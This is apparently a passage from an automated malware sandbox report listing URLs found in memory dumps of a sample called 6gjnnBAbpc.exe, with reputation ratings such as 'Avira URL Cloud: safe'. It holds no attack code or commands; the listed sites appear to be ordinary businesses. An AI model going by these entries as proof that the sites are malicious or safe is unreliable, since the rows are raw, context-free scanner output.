https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni	6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.aevga.com/	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314457404.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313963475.0000000008D77000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myropcb.com/services-capabilities/pcb-restoration/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myropcb.com/services-capabilities/stencil/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valselit.com/177-appartement-a-vendre-sigean-30378	6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.myropcb.com/why-use-myro/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pwd.org/r	6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0	6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.com-sit.com/wp-content/themes/betheme/js/plugins/chart.min.js?ver=26.6	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 